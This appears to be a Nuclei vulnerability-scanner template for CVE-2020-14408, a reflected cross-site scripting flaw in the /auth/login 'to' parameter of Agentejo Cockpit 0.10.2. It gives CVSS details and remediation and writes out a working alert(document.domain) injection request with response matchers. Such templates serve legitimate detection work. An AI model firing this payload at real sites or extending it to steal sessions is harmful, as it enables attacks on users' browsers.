53 lines
2.0 KiB
YAML
53 lines
2.0 KiB
YAML
id: CVE-2020-14408
|
|
|
|
info:
|
|
name: Agentejo Cockpit 0.10.2 - Cross-Site Scripting
|
|
author: edoardottt
|
|
severity: medium
|
|
description: Agentejo Cockpit 0.10.2 contains a reflected cross-site scripting vulnerability due to insufficient sanitization of the to parameter in the /auth/login route, which allows for injection of arbitrary JavaScript code into a web page's content.
|
|
impact: |
|
|
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
|
|
remediation: |
|
|
Upgrade to the latest version of Agentejo Cockpit or apply the vendor-provided patch to fix the XSS vulnerability.
|
|
reference:
|
|
- https://github.com/agentejo/cockpit/issues/1310
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-14408
|
|
- https://github.com/ARPSyndicate/kenzer-templates
|
|
- https://github.com/StarCrossPortal/scalpel
|
|
- https://github.com/anonymous364872/Rapier_Tool
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2020-14408
|
|
cwe-id: CWE-79
|
|
epss-score: 0.00113
|
|
epss-percentile: 0.44682
|
|
cpe: cpe:2.3:a:agentejo:cockpit:0.10.2:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: agentejo
|
|
product: cockpit
|
|
tags: cve2020,cve,cockpit,agentejo,xss,oss
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/auth/login?to=/92874%27;alert(document.domain)//280"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "redirectTo = '/92874';alert(document.domain)//280';"
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "text/html"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4a0a00473045022100d9c05fb3baf867f35afbb4c5ecbc371b317d9ad9a8ce6ccb6c7fdbc1f3231cf902207c1160d456c6b712685c5c2f9c8f5a2c8102f6d5ec75ce531f6daa39b39f4bd7:922c64590222798bb761d5b6d8e72950 |